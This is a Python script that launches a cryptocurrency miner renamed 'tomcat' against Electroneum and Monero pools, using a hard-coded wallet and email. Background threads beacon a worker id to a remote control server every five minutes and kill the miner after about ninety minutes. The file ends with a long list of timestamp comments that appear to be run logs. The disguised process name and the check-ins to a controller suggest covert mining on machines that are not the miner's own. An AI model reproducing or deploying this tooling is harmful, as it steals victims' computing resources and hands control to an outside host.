import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:19:05.090741
#2018-02-17 17:06:05.616771
#2018-02-17 18:54:07.231825
#2018-02-17 20:42:07.430053
#2018-02-17 22:29:06.428334
#2018-02-18 00:11:07.543980
#2018-02-18 02:03:05.901847
#2018-02-18 03:51:01.300400
#2018-02-18 05:37:07.036539
#2018-02-18 07:30:08.348502
#2018-02-18 09:18:06.474286
#2018-02-18 11:04:06.514364
#2018-02-18 12:51:04.635090
#2018-02-18 14:39:03.888961
#2018-02-18 16:28:05.405416
#2018-02-18 18:17:06.945908
#2018-02-18 20:02:06.937381
#2018-02-18 21:49:05.874119
#2018-02-18 23:38:05.047384
#2018-02-19 01:24:07.688918
#2018-02-19 03:12:03.490031
#2018-02-19 04:57:05.896067
#2018-02-19 06:42:03.829246
#2018-02-19 08:32:05.636149
#2018-02-19 10:21:05.386548
#2018-02-19 12:09:04.407240
#2018-02-19 13:55:04.496734
#2018-02-19 15:44:05.269804
#2018-02-19 17:32:04.666747
#2018-02-19 19:21:03.753969
#2018-02-19 21:08:05.576130
#2018-02-19 22:55:03.048980
#2018-02-20 00:39:07.958621
#2018-02-20 02:29:04.292839
#2018-02-20 04:19:06.325657
#2018-02-20 06:03:07.344466
#2018-02-20 07:48:02.232940
#2018-02-20 09:35:08.463842
#2018-02-20 11:19:03.534253
#2018-02-20 13:05:09.046664
#2018-02-20 14:50:08.916375
#2018-02-20 16:37:07.757709
#2018-02-20 18:24:05.891416
#2018-02-20 20:14:09.636188
#2018-02-20 22:00:12.057801
#2018-02-20 23:41:02.051029
#2018-02-21 01:25:06.611042
#2018-02-21 03:14:05.713185
#2018-02-21 05:02:05.408304
#2018-02-21 06:50:01.467502
#2018-02-21 08:35:09.650419
#2018-02-21 10:20:10.312268
#2018-02-21 12:09:10.064432
#2018-02-21 13:58:05.113594
#2018-02-21 15:42:10.393186
#2018-02-21 17:35:12.318635
#2018-02-21 19:22:05.391264
#2018-02-21 21:09:06.961831
#2018-02-21 22:57:05.296097
#2018-02-22 00:44:02.072610
#2018-02-22 02:32:07.016967
#2018-02-22 04:18:08.043777
#2018-02-22 06:03:05.110689
#2018-02-22 07:49:07.175128
#2018-02-22 09:38:05.576281
#2018-02-22 11:22:11.526507
#2018-02-22 13:07:05.242100
#2018-02-22 14:57:04.182446
#2018-02-22 16:42:10.035769
#2018-02-22 18:28:05.828396
#2018-02-22 20:21:06.030940
#2018-02-22 22:07:01.789465
#2018-02-22 23:55:02.815795
#2018-02-23 01:43:05.744953
#2018-02-23 03:31:04.371463
#2018-02-23 05:16:02.142017
#2018-02-23 07:01:04.319959
#2018-02-23 08:50:07.336746
#2018-02-23 11:08:01.527791
#2018-02-23 13:01:10.547080
#2018-02-23 14:46:10.243763
#2018-02-23 16:34:03.913736
#2018-02-23 18:20:06.594873
#2018-02-23 20:06:04.810705
#2018-02-23 21:51:08.269920
#2018-02-23 23:37:05.222204
#2018-02-24 01:26:02.183003
#2018-02-24 03:16:06.373938
#2018-02-24 05:00:09.095562
#2018-02-24 06:50:08.502908
#2018-02-24 08:33:05.139262
#2018-02-24 10:21:01.612979
#2018-02-24 12:16:05.149289
#2018-02-24 14:07:05.031526
#2018-02-24 15:53:04.399317
#2018-02-24 17:47:06.981069
#2018-02-24 19:35:08.042544
#2018-02-24 21:22:05.281870
#2018-02-25 00:02:04.415722
#2018-02-25 04:24:01.903194
#2018-02-25 07:57:06.396310